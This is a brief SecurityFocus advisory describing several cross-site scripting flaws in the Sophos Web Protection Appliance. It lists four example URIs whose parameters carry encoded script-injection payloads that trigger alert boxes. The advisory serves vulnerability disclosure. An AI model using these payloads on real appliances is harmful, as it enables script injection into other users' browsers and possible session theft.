Sophos Web Protection Appliance Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues with a web browser.

The following example URIs are available:

https://www.example.com/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://www.example.com/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://www.example.com/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://www.example.com/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus